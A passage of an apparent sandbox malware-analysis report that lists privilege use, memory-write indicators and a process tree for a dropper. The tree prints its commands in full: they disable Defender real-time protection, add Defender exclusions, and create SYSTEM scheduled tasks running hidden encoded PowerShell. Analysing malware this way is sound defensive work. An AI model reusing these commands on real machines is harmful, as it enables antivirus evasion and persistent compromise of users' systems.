SeShutdownPrivilege 2932 WMIC.exe Token: SeSystemEnvironmentPrivilege 2932 WMIC.exe Token: SeUndockPrivilege 2932 WMIC.exe Token: SeManageVolumePrivilege 2932 WMIC.exe Token: SeDebugPrivilege 2244 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2964 WMIC.exe Token: SeIncreaseQuotaPrivilege 2964 WMIC.exe Token: SeSecurityPrivilege 2964 WMIC.exe Token: SeTakeOwnershipPrivilege 2964 WMIC.exe Token: SeLoadDriverPrivilege 2964 WMIC.exe Token: SeSystemtimePrivilege 2964 WMIC.exe Token: SeBackupPrivilege 2964 WMIC.exe Token: SeRestorePrivilege 2964 WMIC.exe Token: SeShutdownPrivilege 2964 WMIC.exe Token: SeSystemEnvironmentPrivilege 2964 WMIC.exe Token: SeUndockPrivilege 2964 WMIC.exe Token: SeManageVolumePrivilege 2964 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2036 wrote to memory of 2376 2036 b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3.exe 30 PID 2036 wrote to memory of 2376 2036 b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3.exe 30 PID 2036 wrote to memory of 2376 2036 b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3.exe 30 PID 2036 wrote to memory of 2376 2036 b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3.exe 30 PID 2036 wrote to memory of 2376 2036 b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3.exe 30 PID 2036 wrote to memory of 2376 2036 b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3.exe 30 PID 2036 wrote to memory of 2376 2036 b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3.exe 30 PID 2376 wrote to memory of 1812 2376 Install.exe 31 PID 2376 wrote to memory of 1812 2376 Install.exe 31 PID 2376 wrote to memory of 1812 2376 Install.exe 31 PID 2376 wrote to memory of 1812 2376 Install.exe 31 PID 2376 wrote to memory of 1812 2376 Install.exe 31 PID 2376 wrote to memory of 1812 2376 Install.exe 31 PID 2376 wrote to memory of 1812 2376 Install.exe 31 PID 1812 wrote to memory of 2464 1812 Install.exe 34 PID 1812 wrote to memory of 2464 1812 Install.exe 34 PID 1812 wrote to memory of 2464 1812 Install.exe 34 PID 1812 wrote to memory of 2464 1812 Install.exe 34 PID 1812 wrote to memory of 2464 1812 Install.exe 34 PID 1812 wrote to memory of 2464 1812 Install.exe 34 PID 1812 wrote to memory of 2464 1812 Install.exe 34 PID 2464 wrote to memory of 2848 2464 forfiles.exe 36 PID 2464 wrote to memory of 2848 2464 forfiles.exe 36 PID 2464 wrote to memory of 2848 2464 forfiles.exe 36 PID 2464 wrote to memory of 2848 2464 forfiles.exe 36 PID 2464 wrote to memory of 2848 2464 forfiles.exe 36 PID 2464 wrote to memory of 2848 2464 forfiles.exe 36 PID 2464 wrote to memory of 2848 2464 forfiles.exe 36 PID 2848 wrote to memory of 2852 2848 cmd.exe 37 PID 2848 wrote to memory of 2852 2848 cmd.exe 37 PID 2848 wrote to memory of 2852 2848 cmd.exe 37 PID 2848 wrote to memory of 2852 2848 cmd.exe 37 PID 2848 wrote to memory of 2852 2848 cmd.exe 37 PID 2848 wrote to memory of 2852 2848 cmd.exe 37 PID 2848 wrote to memory of 2852 2848 cmd.exe 37 PID 2852 wrote to memory of 2736 2852 powershell.exe 38 PID 2852 wrote to memory of 2736 2852 powershell.exe 38 PID 2852 wrote to memory of 2736 2852 powershell.exe 38 PID 2852 wrote to memory of 2736 2852 powershell.exe 38 PID 2852 wrote to memory of 2736 2852 powershell.exe 38 PID 2852 wrote to memory of 2736 2852 powershell.exe 38 PID 2852 wrote to memory of 2736 2852 powershell.exe 38 PID 1812 wrote to memory of 2336 1812 Install.exe 39 PID 1812 wrote to memory of 2336 1812 Install.exe 39 PID 1812 wrote to memory of 2336 1812 Install.exe 39 PID 1812 wrote to memory of 2336 1812 Install.exe 39 PID 1812 wrote to memory of 2336 1812 Install.exe 39 PID 1812 wrote to memory of 2336 1812 Install.exe 39 PID 1812 wrote to memory of 2336 1812 Install.exe 39 PID 2560 wrote to memory of 2432 2560 taskeng.exe 42 PID 2560 wrote to memory of 2432 2560 taskeng.exe 42 PID 2560 wrote to memory of 2432 2560 taskeng.exe 42 PID 2560 wrote to memory of 2432 2560 taskeng.exe 42 PID 2432 wrote to memory of 2020 2432 ikkfONE.exe 43 PID 2432 wrote to memory of 2020 2432 ikkfONE.exe 43 PID 2432 wrote to memory of 2020 2432 ikkfONE.exe 43 PID 2432 wrote to memory of 2020 2432 ikkfONE.exe 43 PID 2432 wrote to memory of 1712 2432 ikkfONE.exe 45 PID 2432 wrote to memory of 1712 2432 ikkfONE.exe 45 PID 2432 wrote to memory of 1712 2432 ikkfONE.exe 45 PID 2432 wrote to memory of 1712 2432 ikkfONE.exe 45 PID 1664 wrote to memory of 1144 1664 taskeng.exe 48 PID 1664 wrote to memory of 1144 1664 taskeng.exe 48 PID 1664 wrote to memory of 1144 1664 taskeng.exe 48
Processes
-
C:\Users\Admin\AppData\Local\Temp\b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3.exe"C:\Users\Admin\AppData\Local\Temp\b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Users\Admin\AppData\Local\Temp\7zSCC35.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Users\Admin\AppData\Local\Temp\7zSCDCA.tmp\Install.exe.\Install.exe /ZwkdidgjGba "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbMwfSaEkvrmTtNtmp" /SC once /ST 05:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe\XNGbWYsbbEbynxB\ikkfONE.exe\" cK /msRididIcQ 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2336
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 5044⤵
- Loads dropped DLL
- Program crash
PID:1004
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {19DAB8F3-616D-424D-A3F4-4F8A8809284F} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe\XNGbWYsbbEbynxB\ikkfONE.exeC:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe\XNGbWYsbbEbynxB\ikkfONE.exe cK /msRididIcQ 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCslMOAcq" /SC once /ST 02:15:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gCslMOAcq"3⤵PID:1712
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gCslMOAcq"3⤵PID:2984
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:464
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1636
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:2944
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gEqEqakXx" /SC once /ST 02:25:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gEqEqakXx"3⤵PID:752
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gEqEqakXx"3⤵PID:2444
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:1924
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:1624
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:984
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:323⤵PID:2516
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:643⤵PID:1936
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:323⤵PID:2760
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:324⤵PID:2824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:643⤵PID:2836
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:644⤵PID:2892
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\QpEhKTiRofuFzpEd\xJZbFTiH\HOoBbSzDWzqHdGzU.wsf"3⤵PID:2884
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\QpEhKTiRofuFzpEd\xJZbFTiH\HOoBbSzDWzqHdGzU.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2860 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CYZcjjLrQSSSC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CYZcjjLrQSSSC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUXfJBljbcUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUXfJBljbcUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MaCEdJmjU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MaCEdJmjU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWTlFEDWyZjU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWTlFEDWyZjU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hDwfgHvtnjxOxeVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hDwfgHvtnjxOxeVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CYZcjjLrQSSSC" /t REG_DWORD /d 0 /reg:324⤵PID:2244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CYZcjjLrQSSSC" /t REG_DWORD /d 0 /reg:644⤵PID:300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUXfJBljbcUn" /t REG_DWORD /d 0 /reg:324⤵PID:2980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUXfJBljbcUn" /t REG_DWORD /d 0 /reg:644⤵PID:1932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MaCEdJmjU" /t REG_DWORD /d 0 /reg:324⤵PID:2944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MaCEdJmjU" /t REG_DWORD /d 0 /reg:644⤵PID:620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR" /t REG_DWORD /d 0 /reg:324⤵PID:1780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR" /t REG_DWORD /d 0 /reg:644⤵PID:2028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWTlFEDWyZjU2" /t REG_DWORD /d 0 /reg:324⤵PID:2208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWTlFEDWyZjU2" /t REG_DWORD /d 0 /reg:644⤵PID:1032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hDwfgHvtnjxOxeVB" /t REG_DWORD /d 0 /reg:324⤵PID:924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hDwfgHvtnjxOxeVB" /t REG_DWORD /d 0 /reg:644⤵PID:1060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:1312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe" /t REG_DWORD /d 0 /reg:324⤵PID:1548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe" /t REG_DWORD /d 0 /reg:644⤵PID:1068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:324⤵PID:916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:644⤵PID:2220
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gVyHgzwqh" /SC once /ST 04:19:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2444
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gVyHgzwqh"3⤵PID:1608
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gVyHgzwqh"3⤵PID:2748
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2636
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2160
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2460
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2124
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LTdmnWMddFrWELagp" /SC once /ST 01:01:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QpEhKTiRofuFzpEd\NeoVxqNkrzcyHFJ\pjDElFp.exe\" aK /QhUOdidwt 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2660
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "LTdmnWMddFrWELagp"3⤵PID:2612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 4843⤵
- Loads dropped DLL
- Program crash
PID:2684
-
-
-
C:\Windows\Temp\QpEhKTiRofuFzpEd\NeoVxqNkrzcyHFJ\pjDElFp.exeC:\Windows\Temp\QpEhKTiRofuFzpEd\NeoVxqNkrzcyHFJ\pjDElFp.exe aK /QhUOdidwt 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2664 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbMwfSaEkvrmTtNtmp"3⤵PID:2020
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:1976
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:2700
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:872
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
